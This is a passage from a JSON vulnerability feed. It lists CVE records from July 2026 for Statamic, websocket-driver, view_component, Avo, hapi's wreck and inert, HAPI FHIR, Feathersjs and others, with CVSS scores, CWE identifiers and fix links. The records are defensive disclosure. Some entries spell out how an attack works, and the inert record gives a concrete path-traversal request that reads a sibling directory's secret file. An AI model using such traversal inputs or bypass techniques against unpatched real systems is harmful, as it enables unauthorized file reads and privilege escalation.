6.20.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":2.7}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-367"},{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/statamic/cms/commit/d8f4575c425e2932f22ac030568e990be0dae2da","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/pull/14761","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v5.73.24","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v6.20.1","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/security/advisories/GHSA-v5c4-wcpj-x73m","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54243","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.390","lastModified":"2026-07-17T21:17:08.390","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.24 and 6.20.1, form submission values in src/Forms/Exporters/CsvExporter.php were not neutralized for spreadsheet formula characters when exported to CSV. A submission containing a value beginning with a formula trigger character, such as =, +, -, or @, could be interpreted as a live formula when a Control Panel user opens the export in a spreadsheet application. Form submissions can come from unauthenticated front-end visitors, so the malicious value can be supplied by an anonymous user and is later triggered by an editor opening the export. This issue is fixed in versions 5.73.24 and 6.20.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"statamic","product":"cms","versions":[{"version":"< 5.73.24","status":"affected"},{"version":">= 6.0.0, < 6.20.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-1236"}]}],"references":[{"url":"https://github.com/statamic/cms/commit/f17c098e52a92597fc5f81bd287700b3d05f4add","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/pull/14760","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v5.73.24","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v6.20.1","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/security/advisories/GHSA-h77m-qrj7-jxcw","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54244","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.523","lastModified":"2026-07-17T21:17:08.523","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.0 and 6.20.3, the Live Preview endpoint for existing entries and terms in src/Http/Controllers/CP/PreviewController.php only checked view authorization, but it accepts and renders caller-supplied field values. A Control Panel user with view but not edit permission could therefore submit content they were not authorized to author and generate a shareable Live Preview URL rendering it. This issue is fixed in versions 5.74.0 and 6.20.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"statamic","product":"cms","versions":[{"version":"< 5.74.0","status":"affected"},{"version":">= 6.0.0, < 6.20.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/statamic/cms/commit/87b9998f4d9e40de53346402ccf6eb3c17ba168f","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/pull/14791","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v5.74.0","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/releases/tag/v6.20.3","source":"security-advisories@github.com"},{"url":"https://github.com/statamic/cms/security/advisories/GHSA-7mqq-4v55-88gh","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54466","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.657","lastModified":"2026-07-17T21:17:08.657","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.7.5, the frame format in draft versions of the WebSocket protocol includes a length header that allows an arbitrarily large integer to be encoded as a sequence of bytes with the high bit set. By sending an indefinite sequence of bytes with values 0x80 or above, a client can make the server parse these bytes into an ever-growing integer in lib/websocket/driver/draft75.js; because JavaScript numbers are 64-bit floating point values, this number will eventually lose precision and lead to the subsequent payload being parsed incorrectly. This issue is fixed in version 0.7.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"faye","product":"websocket-driver-node","versions":[{"version":"< 0.7.5","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.2,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-130"}]}],"references":[{"url":"https://github.com/faye/websocket-driver-node/commit/5b197ca874dab58e96cacad8a3c256797d804680","source":"security-advisories@github.com"},{"url":"https://github.com/faye/websocket-driver-node/security/advisories/GHSA-xv26-6w52-cph6","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54490","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.780","lastModified":"2026-07-17T21:17:08.780","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.7.5, if this library is used with the permessage-deflate extension, a WebSocket server or client can be made to accept messages that are larger than the configured maximum message size because the limit is checked against the message frames' length headers, which give the size of the compressed data, not the size after decompression in lib/websocket/driver/hybi.js. This can lead to applications accepting larger messages than expected and exceeding their intended resource usage. This issue is fixed in version 0.7.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"faye","product":"websocket-driver-node","versions":[{"version":"< 0.7.5","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/faye/websocket-driver-node/commit/c55679a5b18251dd0a55d18a0cc6a4fd8822b92f","source":"security-advisories@github.com"},{"url":"https://github.com/faye/websocket-driver-node/security/advisories/GHSA-mp7j-qc5w-4988","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54497","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:08.907","lastModified":"2026-07-17T21:17:08.907","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 4.0.0 until 4.12.0, ViewComponent::Base instances retain render-scoped objects across calls to render_in; if the same component, collection, or spacer component instance is reused across requests, users, tenants, or threads, later renders can use stale helpers, controller, request, view_flow, format/variant details, and slot child context from an earlier render. This can cause authorization-aware components to render privileged UI for a lower-privileged user, generate links using a stale Host header, leak slot/helper state, and mix request context under concurrent rendering. This issue is fixed in version 4.12.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ViewComponent","product":"view_component","versions":[{"version":">= 4.0.0, < 4.12.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":5.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-362"},{"lang":"en","value":"CWE-488"},{"lang":"en","value":"CWE-668"}]}],"references":[{"url":"https://github.com/ViewComponent/view_component/commit/6796b2e89d0bd7b9d7d763a86275e5334731dd61","source":"security-advisories@github.com"},{"url":"https://github.com/ViewComponent/view_component/releases/tag/v4.12.0","source":"security-advisories@github.com"},{"url":"https://github.com/ViewComponent/view_component/security/advisories/GHSA-9h85-g7w3-rh49","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54498","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:09.043","lastModified":"2026-07-17T21:17:09.043","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 4.0.0 until 4.12.0, ViewComponent::Base#around_render can return HTML-unsafe strings that bypass the escaping behavior applied to normal #call return values. This creates an XSS risk when downstream applications use around_render to wrap, replace, instrument, or conditionally return content that includes user-controlled data, and ViewComponent::Collection#render_in can amplify the issue by joining per-item results and marking the entire output html_safe, converting raw unsafe output into an ActiveSupport::SafeBuffer. This issue is fixed in version 4.12.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ViewComponent","product":"view_component","versions":[{"version":">= 4.0.0, < 4.12.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":5.8}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/ViewComponent/view_component/commit/48e5fd2d602344c7d33019fbc5c8b087e315bb78","source":"security-advisories@github.com"},{"url":"https://github.com/ViewComponent/view_component/commit/6796b2e89d0bd7b9d7d763a86275e5334731dd61","source":"security-advisories@github.com"},{"url":"https://github.com/ViewComponent/view_component/releases/tag/v4.12.0","source":"security-advisories@github.com"},{"url":"https://github.com/ViewComponent/view_component/security/advisories/GHSA-97jw-64cj-jc58","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-55518","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T21:17:09.173","lastModified":"2026-07-17T21:17:09.173","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Avo is a framework to create admin panels for Ruby on Rails apps. Prior to 3.32.1 and 4.0.0.beta.51, Avo's association attach workflow checks attach_<association>? in the UI and GET /resources/:resource/:id/:related/new path, but the actual write endpoint, POST /resources/:resource/:id/:related, does not run the same authorization check before mutating the association through Avo::AssociationsController#create. An authenticated low-privileged Avo user can bypass hidden or disabled attach controls and directly attach related records to a parent record by sending a crafted POST request, which can lead to privilege escalation and cross-tenant data exposure where associations represent authorization-bearing relationships. This issue is fixed in versions 3.32.1 and 4.0.0.beta.51."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"avo-hq","product":"avo","versions":[{"version":">= 4.0.0.beta.1, < 4.0.0.beta.51","status":"affected"},{"version":"< 3.32.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N","baseScore":9.6,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":5.8}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"},{"lang":"en","value":"CWE-862"},{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/avo-hq/avo/commit/995928e586fd1788dd496bd51c4dbe4a79cb2b9c","source":"security-advisories@github.com"},{"url":"https://github.com/avo-hq/avo/pull/4568","source":"security-advisories@github.com"},{"url":"https://github.com/avo-hq/avo/releases/tag/v3.32.1","source":"security-advisories@github.com"},{"url":"https://github.com/avo-hq/avo/security/advisories/GHSA-8fq9-273g-6mrg","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44979","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:12.710","lastModified":"2026-07-17T22:17:12.710","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"@hapi/wreck is an HTTP client utility. Prior to 18.1.1, when @hapi/wreck follows a 3xx redirect to a different hostname, only the Authorization and Cookie headers are stripped, and the standard credential header Proxy-Authorization is forwarded intact to the redirect target, potentially exposing forward-proxy credentials to a host outside the original trust boundary when redirects are enabled through the redirects option or Wreck.defaults({ redirects: ... }). This issue is fixed in version 18.1.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hapijs","product":"wreck","versions":[{"version":"< 18.1.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-200"},{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://github.com/hapijs/wreck/commit/a5b6fac9c684621c1d5733d10a0257697cfea373","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/pull/312","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/releases/tag/v18.1.1","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/security/advisories/GHSA-vhjm-w67q-g75c","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48022","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:14.413","lastModified":"2026-07-17T22:17:14.413","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"@hapi/wreck is an HTTP client utility. Prior to 18.1.2, Wreck strips credential headers including Authorization, Cookie, and Proxy-Authorization before following a cross-origin redirect, but the origin check compares hostnames only and ignores scheme and port, so credentials are forwarded intact across same-host port changes and HTTPS-to-HTTP downgrades, allowing a co-tenant on an adjacent port or a network-position attacker capable of forging a redirect to capture bearer tokens, session cookies, and proxy credentials and impersonate the victim against the upstream service. This issue is fixed in version 18.1.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hapijs","product":"wreck","versions":[{"version":"< 18.1.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-319"},{"lang":"en","value":"CWE-346"},{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://github.com/hapijs/wreck/commit/b93323b63ad3adb14d2b4019d77219182211641e","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/pull/313","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/releases/tag/v18.1.2","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/wreck/security/advisories/GHSA-x426-x7cc-3fpc","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48049","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:14.557","lastModified":"2026-07-17T22:17:14.557","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"@hapi/inert provides static file and directory handlers for hapi.js. From 4.0.0 to 7.1.0, @hapi/inert serves static files from a directory configured with path in the directory or file handlers or relativeTo for h.file(), with confinement enforced by the confine option, but the confinement check compared the resolved absolute path against the confine directory using a raw string-prefix test, so a sibling directory such as /app/static-secret next to /app/static was incorrectly accepted and could allow an unauthenticated remote attacker to read files via /..%2fstatic-secret/secret.txt. This issue is fixed in version 7.1.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hapijs","product":"inert","versions":[{"version":">= 4.0.0, < 7.1.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://github.com/hapijs/inert/commit/bcceb761a43b9d1178eb6bd553e4ad2bb70494d9","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/inert/pull/176","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/inert/releases/tag/v7.1.1","source":"security-advisories@github.com"},{"url":"https://github.com/hapijs/inert/security/advisories/GHSA-rcvq-m9j9-6f4g","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49485","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:16.893","lastModified":"2026-07-17T22:17:16.893","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.9 and 6.9.4.2, all implementations of FHIRPathEngine accept arbitrary FHIRPath expressions and evaluate them without input validation, and the FHIRPath functions matches(), matchesFull(), and replaceMatches() pass user-controlled regular expressions to Java's Pattern.compile() and String.replaceAll() through an incomplete timeout utility. An attacker can send a resource containing an evil regex pattern that causes catastrophic backtracking, exhausting CPU resources and causing denial of service in the FHIR Validator HTTP endpoint and affected org.hl7.fhir.* modules. This issue is fixed in versions 6.9.9 and 6.9.4.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"hapifhir","product":"org.hl7.fhir.core","versions":[{"version":"< 6.9.4.2","status":"affected"},{"version":">= 6.9.5, < 6.9.9","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-1333"}]}],"references":[{"url":"https://github.com/hapifhir/org.hl7.fhir.core/commit/109c88837c032ef399b2eb87ddde86692065cf41","source":"security-advisories@github.com"},{"url":"https://github.com/hapifhir/org.hl7.fhir.core/commit/e08982d2b6f6dcd6c670a762d9cf999179fbe4ed","source":"security-advisories@github.com"},{"url":"https://github.com/hapifhir/org.hl7.fhir.core/pull/2463","source":"security-advisories@github.com"},{"url":"https://github.com/hapifhir/org.hl7.fhir.core/releases/tag/6.9.4.2","source":"security-advisories@github.com"},{"url":"https://github.com/hapifhir/org.hl7.fhir.core/releases/tag/6.9.9","source":"security-advisories@github.com"},{"url":"https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-7cmj-v6x8-frvv","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54335","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:44.840","lastModified":"2026-07-17T22:17:44.840","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Feathersjs is a framework for creating web APIs and real-time applications with TypeScript or JavaScript. In 5.0.44 and earlier, the _.merge(target, source) utility exported by @feathersjs/commons recursively merges source into target by iterating Object.keys(source). When source was produced by JSON.parse and contains a __proto__, constructor, or prototype key, that key is returned as an own-enumerable property; the recursive merge then resolves target['__proto__'] to Object.prototype and writes attacker-supplied properties onto it, polluting the prototype for all plain objects in the process for the lifetime of the Node process. This issue is fixed in version 5.0.45."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"feathersjs","product":"feathers","versions":[{"version":"< 5.0.45","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-1321"}]}],"references":[{"url":"https://github.com/feathersjs/feathers/commit/28b3c03c63bdbff53115fdaa46c56980e7942acc","source":"security-advisories@github.com"},{"url":"https://github.com/feathersjs/feathers/pull/3690","source":"security-advisories@github.com"},{"url":"https://github.com/feathersjs/feathers/releases/tag/v5.0.45","source":"security-advisories@github.com"},{"url":"https://github.com/feathersjs/feathers/security/advisories/GHSA-28xv-ph75-77wh","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-56171","sourceIdentifier":"secure@microsoft.com","published":"2026-07-17T22:17:54.117","lastModified":"2026-07-17T22:17:54.117","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Exposure of private personal information to an unauthorized actor in Windows RDP allows an unauthorized attacker to disclose information over a network."}],"affected":[{"source":"secure@microsoft.com","affectedData":[{"vendor":"Microsoft","product":"Remote Desktop Web Client","versions":[{"version":"2.0.0.0","lessThan":"2.1.65.2","versionType":"custom","status":"affected"}]},{"vendor":"Microsoft","product":"Windows Admin Center","versions":[{"version":"1809.0","lessThan":"2.7.4","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"secure@microsoft.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.2}]},"weaknesses":[{"source":"secure@microsoft.com","type":"Primary","description":[{"lang":"en","value":"CWE-359"}]}],"references":[{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56171","source":"secure@microsoft.com"}]}},{"cve":{"id":"CVE-2026-56740","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:57.153","lastModified":"2026-07-17T22:17:57.153","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"JLine is a Java library for handling console input. Prior to 3.30.14, 